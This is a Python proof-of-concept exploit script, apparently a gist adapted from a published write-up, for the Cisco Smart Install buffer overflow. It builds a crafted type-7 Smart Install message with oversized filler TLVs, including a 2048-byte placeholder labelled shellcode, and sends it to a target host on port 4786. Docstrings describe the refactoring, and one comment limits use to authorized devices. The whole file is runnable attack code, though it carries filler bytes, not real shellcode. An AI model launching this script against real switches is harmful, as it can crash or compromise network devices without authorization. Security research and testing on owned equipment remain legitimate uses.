Adaptation of the Cisco Smart Install PoC from https://embedi.com/blog/cisco-smart-install-remote-code-execution/ — the only change is replacing the optparse dependency with argparse.
# smi_ibc_init_discovery_BoF.py
import argparse
import socket
import struct
import sys
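def parse_args(argv=None):
    """Parse the PoC's command-line options.

    Args:
        argv: argument list to parse. ``None`` (the default) parses
            ``sys.argv[1:]`` exactly as before, so existing callers are
            unaffected; passing a list makes the parser testable without
            patching ``sys.argv``.

    Returns:
        An ``argparse.Namespace`` with ``target`` (required; host or IP of
        the Smart Install client) and ``port`` (int, default 4786).

    Raises:
        SystemExit: on ``--help`` or when ``--target`` is missing
        (standard argparse behaviour).
    """
    parser = argparse.ArgumentParser(
        description='Send a crafted Smart Install message to a client (PoC).')
    parser.add_argument('-t', '--target', help='Smart Install Client',
                        action='store', required=True)
    parser.add_argument('-p', '--port', type=int, help='Port of Client',
                        default=4786)
    return parser.parse_args(argv)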
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    """Encode one type-length-value record.

    Args:
        t: numeric type field, packed with ``t_fmt``.
        v: value bytes; its byte length is packed with ``l_fmt``.
        t_fmt, l_fmt: ``struct`` formats for the type and length fields
            (big-endian unsigned 32-bit by default).

    Returns:
        ``pack(t_fmt, t) + pack(l_fmt, len(v)) + v`` as bytes.
    """
    fields = [struct.pack(t_fmt, t), struct.pack(l_fmt, len(v))]
    return b''.join(fields) + v
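def send_packet(sock, packet):
    """Write all of ``packet`` to the connected socket ``sock``.

    Uses ``sendall`` instead of ``send``: ``send`` may write only part of
    the buffer and return the byte count, which the original discarded, so
    a short write would have silently truncated the crafted message.

    Raises:
        socket.error: if the connection fails mid-write.
    """
    sock.sendall(packet)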
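def receive(sock, bufsize=4096):
    """Read and return up to ``bufsize`` bytes from ``sock``.

    The original called ``sock.recv()`` with no argument, which always
    raises ``TypeError`` because ``recv`` requires a buffer size; the size
    is now a parameter with a default so existing callers keep working.
    Per the socket API an empty bytes object means the peer closed.
    """
    return sock.recv(bufsize)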
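if __name__ == "__main__":
    # PoC for the Cisco Smart Install buffer overflow described in the
    # embedi write-up this gist adapts: it sends one crafted Smart Install
    # message (header type 7) to the client port and exits. Nothing is read
    # back, so a successful send says nothing about whether the target was
    # affected. Only run this against devices you are authorized to test.
    args = parse_args()
    print("[*] Connecting to Smart Install Client %s port %d"
          % (args.target, args.port))

    # Message body, kept byte-for-byte as in the original PoC: a type-1 TLV
    # whose value is 36 filler bytes, a length word counting
    # payload + shellcode + 40, and the 176-byte payload; the 2048-byte
    # "shellcode" filler follows untagged as a second TLV.
    payload = b'BBBB' * 44
    shellcode = b'D' * 2048
    data = b'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode

    hdr = b'\x00\x00\x00\x01'                  # msg_from
    hdr += b'\x00\x00\x00\x01'                 # version
    hdr += b'\x00\x00\x00\x07'                 # msg_hdr_type
    # NOTE: data_length covers only `data`, not tlv_1's header or tlv_2;
    # this mismatch is part of the original PoC and is deliberately kept.
    hdr += struct.pack('>I', len(data))        # data_length
    pkt = hdr + tlv_1 + tlv_2

    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The original had no timeout, so a filtered port would hang forever.
    con.settimeout(10)
    try:
        try:
            con.connect((args.target, args.port))
        except socket.error as e:
            print("[-] Could not connect to %s:%d: %s" % (args.target, args.port, e))
            sys.exit(1)
        print("[*] Send a malicious packet")
        send_packet(con, pkt)
    finally:
        con.close()  # the original never closed the socket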